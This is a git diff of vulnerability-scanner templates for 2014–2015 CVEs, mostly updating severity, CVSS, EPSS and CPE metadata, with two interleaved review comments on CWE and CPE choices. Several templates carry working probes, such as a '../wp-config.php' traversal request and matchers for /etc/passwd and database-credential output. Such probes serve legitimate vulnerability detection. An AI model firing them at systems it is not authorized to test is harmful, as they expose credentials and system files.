4818bef18d..ad862af9f6 100644 
--- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -11,14 +11,19 @@ info: - https://www.exploit-db.com/exploits/37604/ - http://seclists.org/fulldisclosure/2015/Jul/44 - https://nvd.nist.gov/vuln/detail/CVE-2014-8676 + - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2014-8676 cwe-id: CWE-22 - tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi + epss-score: 0.00195 + cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: soplanning + product: soplanning + tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi http: - method: GET diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index fbe9010a8b..d6b223ccc6 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -3,7 +3,7 @@ id: CVE-2014-8682 info: name: Gogs (Go Git Service) - SQL Injection author: dhiyaneshDK,daffainfo - severity: critical + severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 
@@ -13,13 +13,17 @@ info: - https://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2014-8682 cwe-id: CWE-89 + epss-score: 0.00808 + cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Sign In - Gogs" + vendor: gogits + product: gogs tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli http: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index c7297935e2..d4f0792a08 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -3,20 +3,27 @@ id: CVE-2014-8799 info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://wordpress.org/plugins/dukapress/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943 + - https://plugins.trac.wordpress.org/changeset/1024640/dukapress classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-8799 cwe-id: CWE-22 + epss-score: 0.17844 + cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/dukapress" + framework: wordpress + vendor: dukapress + product: dukapress tags: cve,cve2014,wordpress,wp-plugin,lfi,edb http: 
@@ -27,12 +34,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_USER" - "DB_HOST" - part: body condition: and - type: status diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 7f4a224f7f..d3dc1bd90d 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -9,15 +9,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - http://websecurity.com.ua/7152/ - http://seclists.org/fulldisclosure/2014/Jul/65 - - http://web.archive.org/web/20210615134835/https://www.securityfocus.com/bid/68525 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-9094 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.83554 + cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/dzs-videogallery" + framework: wordpress + vendor: digitalzoomstudio + product: video_gallery tags: cve2014,wordpress,xss,wp-plugin,seclists,cve http: diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 74203611c2..d7b274ff66 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -3,7 +3,7 @@ id: CVE-2014-9119 info: name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. reference: 
@@ -11,14 +11,20 @@ info: - https://www.exploit-db.com/exploits/35378 - https://nvd.nist.gov/vuln/detail/CVE-2014-9119 - https://wpvulndb.com/vulnerabilities/7726 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb + epss-score: 0.35426 + cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: db_backup_project + product: db_backup + tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb http: - method: GET diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index e633489ab6..430d3ccab7 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -9,14 +9,19 @@ info: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html - - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-9444 - tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth + cwe-id: CWE-79 + epss-score: 0.00287 + cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 - + framework: wordpress + vendor: frontend_uploader_project + product: frontend_uploader + tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header 
diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 0026928b20..efe8af9c8a 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve2014,netsweeper,xss,packetstorm,cve + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,xss,packetstorm,cve http: - method: GET diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 3da1089d53..be37a7d4c3 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9607 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: packetstorm,cve,cve2014,netsweeper,xss + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: packetstorm,cve,cve2014,netsweeper,xss http: - method: GET @@ -28,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 3ea4c114fb..5ef0101702 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9608 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve,cve2014,netsweeper,xss,packetstorm + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,xss,packetstorm http: - method: GET 
diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 14b7abd0e4..7bf486ae6c 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -14,11 +14,13 @@ info: cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00149 - tags: cve2014,netsweeper,lfi,packetstorm,cve + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,lfi,packetstorm,cve http: - method: GET diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 543be1df05..dc03faeab2 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 + epss-score: 0.01433 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.01015 - tags: cve,cve2014,netsweeper,default-login,packetstorm metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,default-login,packetstorm http: - raw: @@ -32,10 +34,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 302 - - type: word part: header words: @@ -47,3 +45,7 @@ http: part: header words: - 'Set-Cookie: webadminU=' + + - type: status + status: + - 302 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 6363b12a89..5a9e25679e 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9615 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve,cve2014,netsweeper,xss,packetstorm + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,xss,packetstorm http: - method: GET 
diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 3df4922046..a68c2b43f9 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9617 cwe-id: CWE-601 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00109 - tags: cve,cve2014,netsweeper,redirect,packetstorm + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,redirect,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 65ab3e2e18..88ebfddbca 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -16,9 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 - tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve + epss-score: 0.04784 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve http: - method: GET diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index ced325ad3b..437fa3f2be 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -3,7 +3,7 @@ id: CVE-2015-0554 info: name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure author: daffainfo - severity: high + severity: critical description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. reference: - https://www.exploit-db.com/exploits/35721 
@@ -11,13 +11,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - http://www.exploit-db.com/exploits/35721 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-200 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C + cvss-score: 9.4 cve-id: CVE-2015-0554 - tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 + cwe-id: CWE-264 + epss-score: 0.0196 + cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adb + product: p.dga4001n_firmware + tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 0b1b4d2c61..e8edfddced 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -15,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + epss-score: 0.03864 + cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: candidate-application-form_project + product: candidate-application-form + tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 7baf16d79f..c7358e9464 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml 
@@ -15,10 +15,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000010 - cwe-id: CWE-22 - tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + cwe-id: CWE-284 + epss-score: 0.02653 + cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: simple-image-manipulator_project + product: simple-image-manipulator + tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index ef712bba32..6e9e63b3af 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -10,15 +10,19 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - http://www.vapidlabs.com/advisory.php?v=154 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 - - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000012 cwe-id: CWE-200 + epss-score: 0.00773 + cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/mypixs" + framework: wordpress + vendor: mypixs_project + product: mypixs tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve http: @@ -29,9 +33,10 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 913055efd1..4836458e9d 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml 
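Review bot: `cwe-id: CWE-22` → `cwe-id: CWE-284` in CVE-2015-1000010 replaces a specific weakness (path traversal) with the class-level Improper Access Control entry while the template keeps its `lfi` tag; CVE-2015-1427 in a later hunk does the same (`CWE-77` → `CWE-284`) for an `rce`-tagged sandbox escape. These presumably mirror NVD's current CWE assignment, but class-level CWEs are much less useful to anything that groups or reports findings by weakness type. If the goal is to mirror NVD verbatim that should be stated in the commit message; otherwise I would keep the specific `CWE-22` and `CWE-77`.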
@@ -3,21 +3,26 @@ id: CVE-2015-1427 info: name: ElasticSearch - Remote Code Execution author: pikpikcu - severity: critical + severity: high description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 - - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585 + - http://packetstormsecurity.com/files/130368/Elasticsearch-1.3.7-1.4.2-Sandbox-Escape-Command-Execution.html + - https://access.redhat.com/errata/RHSA-2017:0868 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2015-1427 - tags: cve,cve2015,elastic,rce,elasticsearch,kev + cwe-id: CWE-284 + epss-score: 0.89427 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: elasticsearch + product: elasticsearch + tags: packetstorm,cve,cve2015,elastic,rce,elasticsearch,kev http: - raw: @@ -31,7 +36,6 @@ http: { "name": "test" } - - | POST /_search HTTP/1.1 Host: {{Hostname}} @@ -43,14 +47,14 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 04f395734f..fcd5595c82 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml 
@@ -14,10 +14,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1503 - cwe-id: CWE-200 + cwe-id: CWE-22 + epss-score: 0.95625 + cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"icewarp" + vendor: icewarp + product: mail_server tags: lfi,mail,packetstorm,cve,cve2015,icewarp http: @@ -28,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 85b0f488aa..a9e3963ea6 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -3,7 +3,7 @@ id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x - severity: high + severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. reference: @@ -11,14 +11,20 @@ info: - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 + - https://wpvulndb.com/vulnerabilities/7540 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 + epss-score: 0.92959 + cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 google-query: inurl:/wp-content/plugins/revslider + framework: wordpress + vendor: elegant_themes + product: divi tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 http: 
@@ -28,6 +34,7 @@ http: - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 6f7bf973b3..50e22d49d1 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -8,16 +8,21 @@ info: reference: - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - http://web.archive.org/web/20210122155324/https://www.securityfocus.com/bid/74652/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 + - http://www.securitytracker.com/id/1032261 + - http://www.securitytracker.com/id/1032262 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-1880 cwe-id: CWE-79 - tags: cve,cve2015,xss,fortigates + epss-score: 0.00201 + cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fortinet + product: fortios + tags: cve,cve2015,xss,fortigates,intrusive http: - method: GET @@ -26,17 +31,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - - type: word + part: header words: - - "" - part: body + - text/html - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index aa326fb3b5..df78b925c1 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml 
@@ -3,7 +3,7 @@ id: CVE-2015-2067 info: name: Magento Server MAGMI - Directory Traversal author: daffainfo - severity: high + severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/35996 @@ -14,9 +14,14 @@ info: cvss-score: 5 cve-id: CVE-2015-2067 cwe-id: CWE-22 + epss-score: 0.01338 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 shodan-query: http.component:"Magento" + framework: magento_server + vendor: magmi_project + product: magmi tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi http: @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 0691e57f57..67480a5b4d 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -14,10 +14,15 @@ info: cvss-score: 4.3 cve-id: CVE-2015-2068 cwe-id: CWE-79 + epss-score: 0.00146 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 shodan-query: http.component:"Magento" verified: true + framework: magento_server + vendor: magmi_project + product: magmi tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss http: diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 3f3c4de28c..e4f753a49f 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml 
@@ -10,28 +10,35 @@ info: - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - https://nvd.nist.gov/vuln/detail/CVE-2015-2080 + - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - tags: cve,cve2015,jetty,packetstorm + epss-score: 0.95465 + cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fedoraproject + product: fedora + tags: cve,cve2015,jetty,packetstorm http: - method: POST path: - "{{BaseURL}}" + headers: Referer: \x00 matchers-condition: and matchers: + - type: word + part: body + words: + - "Illegal character 0x0 in state" + - type: status status: - 400 - - type: word - words: - - "Illegal character 0x0 in state" - part: body diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index babe465959..ef0c99aad9 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml 
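Review bot: `+ cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*`, `+ vendor: fedoraproject` and `+ product: fedora` attach an operating-system CPE to a template whose name, packetstorm reference and `Illegal character 0x0 in state` matcher in this same hunk all identify Eclipse Jetty, so anyone filtering templates by vendor or product will never find this check under Jetty. NVD records several configurations for CVE-2015-2080 and the sync appears to have taken the first one; the Jetty application CPE (vendor `eclipse`, product `jetty` in NVD's naming — please confirm against the CVE's configuration data) is the one that describes what the matcher actually detects, and `vendor`/`product` should be derived from it.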
@@ -3,21 +3,25 @@ id: CVE-2015-2166 info: name: Ericsson Drutt MSDP - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. reference: - https://www.exploit-db.com/exploits/36619 - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ + - https://www.exploit-db.com/exploits/36619/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - tags: cve,cve2015,lfi,ericsson,edb,packetstorm + epss-score: 0.16846 + cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ericsson + product: drutt_mobile_service_delivery_platform + tags: cve,cve2015,lfi,ericsson,edb,packetstorm http: - method: GET diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index b34dfad448..b5536d0979 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2196 info: name: WordPress Spider Calendar <=1.4.9 - SQL Injection author: theamanrawat - severity: critical + severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: 
